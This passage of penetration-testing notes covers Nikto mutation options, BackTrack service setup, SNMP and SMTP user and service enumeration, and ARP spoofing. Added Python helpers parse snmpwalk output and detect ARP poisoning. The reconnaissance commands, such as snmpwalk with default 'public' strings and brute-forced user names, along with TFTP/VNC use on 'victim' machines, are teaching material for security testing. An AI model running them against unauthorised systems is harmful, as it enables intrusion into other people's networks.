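    is what the "-T 58xb" example above relies on.
    """
    selected, excluded = parse_tuning(spec)
    types = set(test_types)
    if types & excluded:
        return False
    return bool(types & selected)


def describe(spec):
    """Human-readable list of the test types a -Tuning string selects."""
    selected, _ = parse_tuning(spec)
    return [f"{t} - {TUNING_TYPES[t]}" for t in sorted(selected)]


if __name__ == "__main__":
    for spec in ("58", "58xb", "x6"):
        print(spec or "(empty)", "->", ", ".join(sorted(parse_tuning(spec)[0])))
```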



== Mutation Technique ==


A mutation will cause Nikto to combine tests or attempt to guess values. These techniques may cause a tremendous amount of tests to be launched against the target. Use the reference number to specify the type, multiple may be combined.

1. Test all files with all root directories. This takes each test and splits it into a list of files and directories. A scan list is then created by combining each file with each directory.
2. Guess for password file names. Takes a list of common password file names (such as "passwd", "pass", "password") and file extensions ("txt", "pwd", "bak", etc.) and builds a list of files to check for.
3. Enumerate user names via Apache (/~user type requests). Exploit a misconfiguration with Apache UserDir setups which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
4. Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests). Exploit a flaw in cgiwrap which allows valid user names to be discovered. This will attempt to brute-force guess user names. A file of known users can also be supplied by supplying the file name in the -mutate-options parameter.
5. Attempt to brute force sub-domain names. This will attempt to brute force known domain names; it will assume the given host (without a www) is the parent domain.
6. Attempt to brute force directory names. This is the only mutate option that requires a file to be passed in the -mutate-options parameter. It will use the given file to attempt to guess directory names. Lists of common directories may be found in the OWASP DirBuster project.

Backtrack Basic Config

Assign Static IP

ifconfig eth0 192.168.0.4/24
route add default gw 192.168.0.1
echo nameserver 192.168.0.200 > /etc/resolv.conf

Apache

You can control the apache server using the apachectl stop / start commands

apachectl start

SSHD

The SSH server can be very useful in various situations, such as SSH tunneling, SCP file transfers, remote access, etc.

Before the SSH server is started for the first time, SSH keys need to be generated.
To generate them, issue the following command
#sshd-generate

You can verify that the server is up and listening using the netstat command
#netstat -ant | grep 22

Tftpd
A Tftpd server can be useful in situations in which you need to transfer files to or from a victim machine.

To start the tftpd, issue the following command
#atftpd --daemon --port 69 /tmp

Verify if tftpd is running
netstat -anu | grep 69


VNC Server

A VNC Server is useful for remote desktop sharing or for sending remote reverse VNC connections from an attacked machine.

To start the VNC server simply type vncserver. You will be prompted for a password and the VNC server will listen on port 5901:

netstat -ant | grep 5901

Check what network interfaces you have
#dmesg | grep -i eth

Wireshark Display Filters

Display Filters
Wireshark uses display filters for general packet filtering while viewing and for its coloring rules.

show only SMTP (25) and ICMP traffic
tcp.port eq 25 or icmp

show only traffic in the LAN 192.168.x.x between workstations and servers, no internet
ip.src==192.168.0.0/16 and ip.dst==192.168.0.0/16

TCP buffer full - source is instructing destination to stop sending data
tcp.window_size == 0 && tcp.flags.reset != 1

Sasser worm: what sasser really did
ls_ads.opnum==0x09

Information Gathering Techniques

Information gathering is one of the most important stages of the attack. This is where we gather basic information about our target in order to be able to launch our attack later on.

Google hacking
Searching within a domain
The site: operator restricts the results to websites in a given domain.

site:microsoft.com

Let's try the filetype operator:

filetype:pdf site:microsoft.com

Whois reconnaissance

Whois is the name of a TCP service, a tool and a database. Whois databases contain nameservers, the registrar, and in some cases full contact information about the domain name.

whois checkpoint.com

Whois can also perform reverse lookups: rather than inputting a domain name we can input an IP address. The whois result usually includes the whole network range which belongs to the organization.

Open Service Information Gathering

Implementation of various service enumeration methods such as SNMP, SMTP, DNS etc.

#nslookup
> www.checkpoint.com

Identify mail servers belonging to an organization

> set type=mx
> checkpoint.com

Identify all the DNS servers authoritative for a domain

> set type=ns
> checkpoint.com

Using the BackTrack dnsenum tool

#cd /pentest/enumeration/dnsenum/
./dnsenum.pl

SNMP reconnaissance
SNMP is a management protocol and is often used to monitor and remotely configure servers and network devices.

SNMP is based on UDP, a stateless protocol, and is therefore susceptible to IP spoofing. In addition, SNMP (v1/v2c) has a weak authentication system: the "private" (read-write) and "public" (read-only) community strings. These community strings are passed unencrypted on the network and are often left in their default state, "private" and "public".


Let's examine some information from a Windows host running SNMP by using the
following command (walking the whole tree from OID 1):

snmpwalk -c public -v1 192.168.0.110 1

Let me demonstrate some interesting commands:
snmpwalk -c public -v1 192.168.0.110 SNMPv2-MIB::sysDescr.0

Enumerating windows users.
snmpwalk -c public -v1 192.168.0.110 1.3 |grep 77.1.2.25 |cut -d" " -f4

Enumerating running services
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWRunName|cut -d" " -f4

Enumerating open tcp ports

snmpwalk -c public -v1 192.168.0.110 1 |grep tcpConnState |cut -d"." -f6 |sort -nu



Enumerating installed software
snmpwalk -c public -v1 192.168.0.110 1 |grep hrSWInstalledName
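The "open tcp ports" pipeline above relies on the layout of the tcpConnState OID index, which is localAddr(4 octets).localPort.remAddr(4 octets).remPort, so field 6 after splitting on "." is the local port. The following is an added example, not from the original notes: it decodes those rows into structured records (on constructed snmpwalk-style sample lines, not a real capture) so an audit of what a host exposes over SNMP does not depend on counting fields.

```python
"""Decode snmpwalk tcpConnState rows into structured connection records.

Added example, not part of the original notes. SAMPLE is constructed to look
like 'snmpwalk -c public -v1 <host> 1 | grep tcpConnState' output; it is not
a capture from a real device.
"""
from collections import namedtuple

TcpConn = namedtuple("TcpConn",
                     "local_addr local_port remote_addr remote_port state")

# Constructed sample rows (TCP-MIB::tcpConnState.<index> = INTEGER: <state>)
SAMPLE = """\
TCP-MIB::tcpConnState.0.0.0.0.135.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.445.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.192.168.0.110.139.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.192.168.0.110.445.192.168.0.4.49152 = INTEGER: established(5)
"""


def parse_tcp_conn_state(line):
    """Parse one tcpConnState row; return a TcpConn or None if it is not one.

    The 10 numbers of the OID index are: 4 octets of the local address, the
    local port, 4 octets of the remote address, the remote port. The local
    port is index field 5 here (0-based), i.e. cut's field 6 in the notes.
    """
    oid, _, value = line.partition(" = ")
    if not oid.startswith("TCP-MIB::tcpConnState."):
        return None
    parts = oid.split(".")[1:]          # drop the "TCP-MIB::tcpConnState" prefix
    if len(parts) != 10 or not all(p.isdigit() for p in parts):
        return None
    nums = [int(p) for p in parts]
    state = value.split(":", 1)[1].strip()   # "INTEGER: listen(2)" -> "listen(2)"
    return TcpConn(".".join(map(str, nums[0:4])), nums[4],
                   ".".join(map(str, nums[5:9])), nums[9], state)


def listening_ports(text):
    """Sorted unique local ports in listen state (what 'sort -nu' produced)."""
    ports = set()
    for line in text.splitlines():
        conn = parse_tcp_conn_state(line)
        if conn is not None and conn.state.startswith("listen"):
            ports.add(conn.local_port)
    return sorted(ports)
```

Rows in other states (established, time-wait) are kept by the parser but excluded from listening_ports, which is the difference from the raw cut/sort pipeline that mixes both.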


There are lots of other interesting searches we can do. As usual, there are more
specialized tools for this task – I personally like snmpenum.pl and snmpcheck.pl.
You can find them in the /pentest/enumeration/snmpenum directory.

./snmpcheck-1.3.pl -t 192.168.0.110

SMTP reconnaissance

Under certain misconfigurations, mail servers can also be used to gather information about a host / network. SMTP supports several interesting commands such as VRFY and EXPN.
A VRFY request asks the server to verify an email address while EXPN asks the server for the membership of a mailing list. These can often be abused in order to verify existing users on a mail server, which can aid the attacker later.
Let's look at an example:

nc -v 192.168.0.10 25



ARP Spoofing


ARP spoofing is a horrendous attack vector. It is very easy to implement and can have disastrous effects on a local network.
The theory behind ARP spoofing is that since ARP replies are not verified or
checked in any way, an attacker can send a spoofed ARP reply to a victim
machine, thereby poisoning its ARP cache. Once we control the ARP cache, we
can redirect traffic from that machine at will, in a switched environment.
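Because ARP replies are never verified, the practical defence on a switched LAN is to watch for the symptom: one IP address suddenly being claimed by a second MAC address. The following is an added example, not from the original notes, of that check (the approach tools such as arpwatch use) run over a constructed list of observed ARP replies; a real deployment would feed it from a packet capture.

```python
"""Flag ARP cache poisoning from a stream of observed ARP replies.

Added example, not part of the original notes. SAMPLE_REPLIES is a
constructed list of (timestamp, sender_ip, sender_mac) tuples standing in
for ARP replies seen on the LAN; the MAC and IP values are made up.
"""
from collections import defaultdict

# Constructed sample: the gateway 192.168.0.1 is announced by one MAC, then a
# second host starts claiming the same IP, the signature of a poisoning attempt.
SAMPLE_REPLIES = [
    (1.0, "192.168.0.1", "00:11:22:33:44:55"),
    (2.0, "192.168.0.4", "00:09:5B:EC:EE:F2"),
    (3.0, "192.168.0.1", "00:11:22:33:44:55"),
    (4.0, "192.168.0.1", "DE:AD:BE:EF:00:01"),
    (5.0, "192.168.0.1", "DE:AD:BE:EF:00:01"),
]


class ArpWatch:
    """Track every MAC that has claimed each IP and alert on a new claimant."""

    def __init__(self):
        self.macs_for_ip = defaultdict(set)   # ip -> set of MACs seen for it
        self.alerts = []                      # (time, ip, sorted list of MACs)

    def observe(self, ts, ip, mac):
        """Record one ARP reply; return True if it conflicts with history."""
        mac = mac.lower()                     # normalise case before comparing
        seen = self.macs_for_ip[ip]
        conflict = bool(seen) and mac not in seen
        seen.add(mac)
        if conflict:
            self.alerts.append((ts, ip, sorted(seen)))
        return conflict


def scan(replies):
    """Run the watcher over a list of replies and return the alerts raised."""
    watcher = ArpWatch()
    for ts, ip, mac in replies:
        watcher.observe(ts, ip, mac)
    return watcher.alerts
```

A legitimate NIC replacement or a DHCP lease moving to another host trips the same check, so an alert is a prompt to verify the mapping, not proof of an attack by itself.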

Ettercap

As usual, customized tools have been created for initiating ARP spoofing attacks.
A nice tool to check out for Windows platforms is Cain & Abel, found on
http://www.oxid.it/. This is a powerful tool capable of sniffing, ARP spoofing,
DNS spoofing, password cracking and more.
My favorite ARP spoofing tool is Ettercap. As described by its authors, Ettercap is
a suite for man in the middle attacks (MITM) on the local LAN. It features
sniffing of live connections, content filtering on the fly and many other
interesting tricks. It supports active and passive dissection of many protocols
(even ciphered ones) and includes many features for network and host analysis.
Let's get Ettercap up and running.